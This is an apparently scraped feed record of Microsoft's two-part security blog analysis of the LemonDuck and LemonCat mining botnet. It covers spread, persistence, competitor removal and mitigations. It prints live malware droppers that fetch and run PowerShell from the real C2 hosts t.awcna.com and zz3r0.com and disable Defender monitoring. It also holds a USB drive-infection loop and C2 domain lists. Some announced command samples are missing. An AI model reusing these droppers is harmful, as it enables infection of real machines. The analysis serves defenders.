"2021-03-25T21:21:07", "type": "mmpc", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MMPC:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. 
LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors.
Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

_Figure 1. Global distribution of LemonDuck botnet activity_

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

## LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again.
Many of these behaviors are still observed in LemonDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, is more likely to have random display names for its C2 sites, and is always observed utilizing “Lemon_Duck” explicitly in script.

The second infrastructure, which we call the “Cat” infrastructure—for primarily using two domains with the word “cat” in them (_sqlnetcat[.]com_, _netcatkit[.]com_)—emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery.
It is often seen delivering the malware Ramnit.

**Sample Duck domains**

 * cdnimages[.]xyz
 * bb3u9[.]com
 * zz3r0[.]com
 * pp6r1[.]com
 * amynx[.]com
 * ackng[.]com
 * hwqloan[.]com
 * js88[.]ag
 * zer9g[.]com
 * b69kq[.]com

**Sample Cat domains**

 * sqlnetcat[.]com
 * netcatkit[.]com
 * down[.]sqlnetcat[.]com

The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, their core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.

_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_

## Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems.
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and formats.
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.

**Sample email subjects**

 * The Truth of COVID-19
 * COVID-19 nCov Special info WHO
 * HALTH ADVISORY:CORONA VIRUS
 * WTF
 * What the fcuk
 * good bye
 * farewell letter
 * broken file
 * This is your order?

**Sample email body content**

 * Virus actually comes from United States of America
 * very important infomation for Covid-19
 * see attached document for your action and discretion.
 * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
 * what's wrong with you?are you out of your mind!!!!!
 * are you out of your mind!!!!!what 's wrong with you?
 * good bye, keep in touch
 * can you help me to fix the file,i can't read it
 * file is brokened, i can't open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.

_Figure 3. Sample email_

While the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).

Since LemonDuck began operating, the .zip to .js file execution method has been the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development.
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.

**April 2020 PowerShell script**

```javascript
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken.
```

**March 2021 PowerShell script**

```javascript
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1);
//This File is broken.
```

After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement within the compromised environment, as well as through USB and connected drives.
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.

```csharp
// Drive-infection loop excerpted in the post; the helpers it calls (blacklist,
// IsSupported, CreateHomeDirectory, Infect, home, inf_data) are defined elsewhere
// in the malware and are not shown.
DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
{
    if (blacklist.Contains(drive.Name))
    { continue; }
    Console.WriteLine("Detect drive:" + drive.Name);
    if (IsSupported(drive))
    {
        // A marker file in the hidden home directory flags a drive as already infected.
        if (!File.Exists(drive + home + inf_data))
        {
            Console.WriteLine("Try to infect " + drive.Name);
            if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
            {
                blacklist.Add(drive.Name);
            }
        }
        else {
            Console.WriteLine(drive.Name + " already infected!");
            blacklist.Add(drive.Name);
        }
    }
    else {
        blacklist.Add(drive.Name);
    }
}
```

## Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader.
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**

_Microsoft 365 Defender Threat Intelligence Team_

The post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

_Published 2021-07-22 | Source: https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/ | CVEs: CVE-2017-0144, CVE-2017-8464, CVE-2019-0708, CVE-2020-0796, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | CVSS v3.1 base score 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H); CVSS v2 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) | Record id MMPC:E537BA51663A720821A67D2A4F7F7F0E_

_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.]_

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.
After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.

In this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.

_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_

## External or human-initialized behavior

LemonDuck activity initiated from external applications – as against self-spreading methods like malicious phishing mail – is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.

In March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.

In some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access.
They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.

This self-patching behavior is in keeping with the attackers’ general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.

The LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.

On the basic side of implementation, this can mean registry, scheduled task, WMI, and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal.
To counter these kinds of behaviors, it’s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.

## General, automatic behavior

If the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.

In contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts, are generally the same.

One of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.

To host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access.
These task names can vary over time, but “blackball”, “blutea”, and “rtsa” have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.

LemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives – specifically the _C:\_ drive – to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it’s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.

LemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with “Security” and “AntiVirus” in the name by running the following commands:

Custom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.

LemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change.
The attackers can also change the threat’s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety of names such as the following:

 * ackng[.]com
 * bb3u9[.]com
 * ttr3p[.]com
 * zz3r0[.]com
 * sqlnetcat[.]com
 * netcatkit[.]com
 * hwqloan[.]com
 * 75[.]ag
 * js88[.]ag
 * qq8[.]ag

In addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:

LemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:

 * _IF.BIN_ (used for lateral movement and privilege escalation)
 * _KR.BIN_ (used for competition removal and host patching)
 * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)

Executables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:

## Lateral movement and privilege escalation

_IF.Bin_, whose name stands for “Infection”, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance.
It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.

_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren’t already infected. If they aren’t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive’s home directory as hidden.

Similarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.

Another tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the “Cat” and “Duck” infrastructures. This tool’s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.

The attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.

Other functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies.
The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:

## Competition removal and host patching

At installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the "Killer" script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.

This "Killer" script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called "blackball", "blutea", or "rtsa", which has been in use by all LemonDuck's infrastructures for the last year along with other task names.

The attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for the Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don't gain web shell access the way they had.
If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.

## Weaponization and continued impact

A miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:

 * _M6.bin_
 * _M6.bin.ori_
 * _M6G.bin_
 * _M6.bin.exe_
 * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN_

Once the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):

Other systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continue long after initial infection, demonstrating that even a "simple" infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.

## Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies.
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.

### Mitigations

Apply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.

 * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).
 * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.
 * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.
 * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.
 * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
 * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.
 * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations: Office 365 will honor these settings and can let potentially harmful messages pass through.
 [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.

### Attack surface reduction

Turn on the following attack surface reduction rules to block or audit activity associated with this threat:

 * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)
 * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)
 * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)
 * [Block all Office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)
 * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)
 * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)
 * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)
 * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)

### Antivirus detections

Microsoft Defender Antivirus detects threat components as the following malware:

 * TrojanDownloader:PowerShell/LemonDuck!MSR
 * TrojanDownloader:Linux/LemonDuck.G!MSR
 * Trojan:Win32/LemonDuck.A
 * Trojan:PowerShell/LemonDuck.A
 * Trojan:PowerShell/LemonDuck.B
 * Trojan:PowerShell/LemonDuck.C
 * Trojan:PowerShell/LemonDuck.D
 * Trojan:PowerShell/LemonDuck.E
 * Trojan:PowerShell/LemonDuck.F
 * Trojan:PowerShell/LemonDuck.G
 * TrojanDownloader:PowerShell/LodPey.A
 * TrojanDownloader:PowerShell/LodPey.B
 * Trojan:PowerShell/Amynex.A
 * Trojan:Win32/Amynex.A

### Endpoint detection and response (EDR) alerts

